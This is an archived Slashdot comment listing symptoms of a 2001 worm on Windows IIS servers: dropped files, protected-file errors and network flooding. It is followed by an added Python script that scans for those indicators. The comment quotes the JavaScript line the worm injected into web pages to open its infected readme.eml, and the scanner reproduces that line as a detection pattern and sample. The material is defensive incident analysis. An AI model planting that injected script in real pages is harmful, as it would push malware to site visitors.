Slashdot Mirror


User: slarblar91

slarblar91's activity in the archive.

Stories: 0 · Comments: 1

Comments · 1

  1. Some symptoms · on New (More) Annoying Microsoft Worm Hits Net · Score: 1

    - Windows File Protection errors:

    At around the time the virus hit, Windows 2000 event log reported file replacement errors for these files:

    "File replacement was attempted on the protected system file ... This file was restored to the original version to maintain system stability":

    d:\program files\microsoft frontpage\version3.0\bin\fp98swin.exe
    d:\program files\common files\microsoft shared\web server extensions\40\bin\tcptest.exe
    d:\program files\common files\microsoft shared\msinfo\msinfo32.exe
    d:\program files\outlook express\wabmig.exe
    d:\program files\outlook express\wab.exe
    d:\program files\windows nt\pinball\pinball.exe
    d:\winnt\system32\mspaint.exe
    d:\program files\outlook express\msimn.exe
    d:\program files\internet explorer\connection wizard\isignup.exe
    d:\program files\internet explorer\connection wizard\inetwiz.exe
    d:\winnt\system32\inetsrv\inetmgr.exe
    d:\program files\internet explorer\connection wizard\icwconn2.exe
    d:\program files\internet explorer\connection wizard\icwconn1.exe
    d:\program files\windows nt\dialer.exe
    d:\program files\netmeeting\conf.exe
    d:\winnt\system32\cmmgr32.exe

    The virus exe references this registry string, so I guess it's possible this is where it's grabbing some of these paths:

    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths

    - IE crashing on NT:

    On NT SP4, IE crashes whenever I try to load it (Dr Watson is triggered). The same crash appears right after logging in as well. If I cancel Watson, IE will continue to run, but the system is very slow. IE also crashed on my Win 2k box, but it works now after I cleaned up some of the virus files.

    - It seems the virus created these files, which I deleted:

    WINNT\mmc.exe - 56 KB
    (icon is the same as for IE html pages)

    WINNT\Admin.dll - 56 KB

    Admin.dll also showed up in a few IIS directories.

    - The bogus mmc.exe process had a couple of instances running when I first discovered the virus. I had to reboot to kill them. At the same time, netstat was reporting tons of connections to port 80 of various hosts as the virus tried to spread.

    - Lots of mep* files found in the WINNT directory on my NT box. The .tmp files seem to contain the mime attachment data for readme.exe:

    mepDF.tmp - 78 KB
    mepEO.tmp - 78 KB
    mepE3.tmp - 78 KB
    mep181.tmp - 78 KB
    mep183.tmp - 78 KB

    mepE2.tmp.exe - 56 KB
    mepE4.tmp.exe - 56 KB
    mepE5.tmp.exe - 56 KB

    A few more similar-looking files.

    At one point I noticed one of the mep*.exe processes was running.

    - On my Win2K box, these files appeared in hundreds of directories (fewer files found on my NT box - probably something to do with how my virtual IIS dirs are set up):

    readme.eml
    desktop.eml
    sample.eml
    desktop.nws (fewer of these than the others)

    - A line of JavaScript code was appended to some of the html and asp files in my virtual IIS dirs:

    <html><script language="JavaScript">window.open ("readme.eml", null, "resizable=no,top=6000,left=6000") </script></html>

    - One of the virus .exe files contains the string:

    Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

    - My suggestion is to do a full search for any of these files and check them out. Note the modification dates.
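The "full search" the commenter suggests, written out as an added example (not the commenter's code): it walks a directory tree, flags the dropped filenames, the mep*.tmp spool files and web pages carrying the appended window.open("readme.eml") line quoted above, and reports each hit's modification time so clustered timestamps stand out. The sample tree it builds is constructed for the demonstration, not real data.

```python
import os, re, tempfile
from datetime import datetime, timezone

# Indicator names quoted in the comment (case-insensitive), mep* spool files,
# and the window.open("readme.eml") line appended to web pages.
DROPPED_NAMES = {"readme.eml", "desktop.eml", "sample.eml", "desktop.nws", "admin.dll"}
MEP_RE = re.compile(r"^mep[0-9a-z]+\.tmp(\.exe)?$", re.IGNORECASE)
APPENDED_JS_RE = re.compile(
    r"<script[^>]*>\s*window\.open\s*\(\s*['\"]readme\.eml['\"]", re.IGNORECASE)


def scan_tree(root):
    """Walk root; return (kind, path, mtime_iso) for each indicator hit."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            low = name.lower()
            mtime = datetime.fromtimestamp(os.path.getmtime(path),
                                           tz=timezone.utc).isoformat()
            if low in DROPPED_NAMES:
                findings.append(("dropped-file", path, mtime))
            elif MEP_RE.match(low):
                findings.append(("mep-spool", path, mtime))
            elif low.endswith((".htm", ".html", ".asp")):
                with open(path, "rb") as fh:
                    body = fh.read().decode("latin-1")  # bytes-safe decode
                if APPENDED_JS_RE.search(body):
                    findings.append(("appended-script", path, mtime))
    return findings


def build_sample_tree():
    """Constructed sample (not real data): clean page, tampered page, .eml, mep spool."""
    root = tempfile.mkdtemp(prefix="iis_sample_")
    os.makedirs(os.path.join(root, "wwwroot", "site"))
    samples = {
        "wwwroot/index.html": "<html><body>clean page</body></html>",
        "wwwroot/site/default.asp": "<html>page</html>"
            '<html><script language="JavaScript">window.open ("readme.eml", null, '
            '"resizable=no,top=6000,left=6000") </script></html>',
        "wwwroot/site/readme.eml": "MIME-Version: 1.0\r\n",
        "mepE2.tmp.exe": "MZ",
    }
    for rel, content in samples.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(content)
    return root
```

Run `scan_tree()` against a real web root or WINNT directory to list hits; the clean index.html in the sample produces no finding.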